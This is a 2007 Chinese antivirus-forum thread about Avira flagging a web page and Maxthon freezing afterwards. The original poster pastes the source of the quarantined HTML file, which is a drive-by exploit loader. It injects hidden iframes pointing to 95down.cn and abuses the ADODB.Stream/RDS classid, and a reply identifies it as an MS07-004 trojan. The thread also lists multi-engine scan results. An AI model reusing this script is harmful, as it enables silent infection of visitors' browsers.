收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 国外杀毒软件 Avira(小红伞) 大家用红伞监控网页出过问题吗?
123下一页
返回列表 发新帖
查看: 3345|回复: 20
收起左侧

[讨论] 大家用红伞监控网页出过问题吗?

[复制链接]
sunwinds
发表于 2007-9-10 11:37:48 | 显示全部楼层 |阅读模式
今天已经是第二次了,只要红伞认为网页上面有病毒,点击放到隔离区,或者拒绝执行后,maxthon就假死了,只能在任务管理器中把maxthon给结束。

大家出过类似的问题吗?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

saga3721
发表于 2007-9-10 11:41:15 | 显示全部楼层
我不会啊,不管多少毒怎么阻止运行都没事,微点红伞接连跳出来也没事
回复

举报

曲中求
发表于 2007-9-10 11:42:47 | 显示全部楼层
我的也不会,一切正常。

红伞P版+傲游2.0.3.4643
回复

举报

saga3721
发表于 2007-9-10 11:50:24 | 显示全部楼层
我用1.6.2(build 60)的

假死是遨游的问题,还有就是毒太多虚拟内存不够了这会假死。你好像是因为前者的缘故。
回复

举报

baerzake
发表于 2007-9-10 11:51:21 | 显示全部楼层
有过一次红伞不停报警,最后假死,等了半天才缓过来
回复

举报

曲中求
发表于 2007-9-10 11:57:16 | 显示全部楼层
1.X的傲游假死是出了名的,不知LZ所用版本是?
回复

举报

sunwinds
 楼主| 发表于 2007-9-10 12:04:19 | 显示全部楼层
我用的maxthon是1.6.2(build 60)的版本,红伞P版最新病毒库,开的高启。

隔离区里面显示是“HEUR/Exploit.html”类似的病毒,于是上网搜。发现两个类似问题的:
http://221.169.193.115/discuz/thread-3495-1-1.html
http://www.kpfans.com/bbs/viewthread.php?tid=118855&extra=&page=1
http://forum.avira.de/thread.php?threadid=23780(这个是红伞官网的,英文看不懂)

后来我把这个文件还原出来,是一个HTML文件,双击了一下,是一个流量统计的网页。再用记事本打开看它的源代码,没发现什么东西。引用里面的是那个HTML的源代码。附件里面是那个HMTL文件,大家试一下。



<SCRIPT language=javascript>
function create_07004()
{
document.write("<iframe width=0 height=0 src=http://www.95down.cn/IENoRun.htm frameborder=0></iframe>");
document.write("<iframe width=0 height=0 src=http://www.95down.cn/07004.htm frameborder=0></iframe>");
}
function do_07004()
{
var cookieString = document.cookie;
var start = cookieString.indexOf("ms07004=");
if (start == -1)
{
  //alert("a");
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = "ms07004=ms_07004;expires=" + expires.toGMTString();
setTimeout("create_07004()",8000);
}
}
</SCRIPT>
<script language=VBScript>
on error resume next
set     server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
do_07004()
else
document.write("<iframe src=http://www.95down.cn/06014.htm width=0 height=0 scrolling=no frameborder=0>")
end if
</script>
<script language="javascript" src="http://count42.51yes.com/click.aspx?id=425491114&logo=12"></script>

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

ykz1991
发表于 2007-9-10 12:11:21 | 显示全部楼层
指向的网站源码加密
等jimmyleo吧
回复

举报

mofunzone
发表于 2007-9-10 12:14:51 | 显示全部楼层
明显是个ms07004木马。。
自己google就知道了
回复

举报

sunwinds
 楼主| 发表于 2007-9-10 12:18:32 | 显示全部楼层
把这个压缩包上传到多杀毒引擎网站上面,也就红伞报病毒,别的都没报
已经传到跟红伞发误报了,不知道会怎么回复。

反病毒引擎版本最后更新扫描结果
AhnLab-V32007.9.8.02007.09.07-
AntiVir7.6.0.52007.09.09HEUR/Exploit.HTML
Authentium4.93.82007.09.09-
Avast4.7.1043.02007.09.08-
AVG7.5.0.4852007.09.09-
BitDefender7.22007.09.10-
CAT-QuickHeal9.002007.09.08-
ClamAV0.91.22007.09.10-
DrWeb4.332007.09.09-
eSafe7.0.15.02007.09.04-
eTrust-Vet31.1.51192007.09.08-
Ewido4.02007.09.09-
FileAdvisor12007.09.10-
Fortinet3.11.0.02007.09.08-
F-Prot4.3.2.482007.09.09-
F-Secure6.70.13030.02007.09.10-
IkarusT3.1.1.122007.09.10-
Kaspersky4.0.2.242007.09.10-
McAfee51152007.09.07-
Microsoft1.28032007.09.09-
NOD32v225172007.09.10-
Norman5.80.022007.09.07-
Panda9.0.0.42007.09.09-
Prevx1V22007.09.10-
Rising19.40.00.002007.09.10-
Sophos4.21.02007.09.10-
Sunbelt2.2.907.02007.09.07-
Symantec102007.09.10-
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-26 19:57 , Processed in 0.135175 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表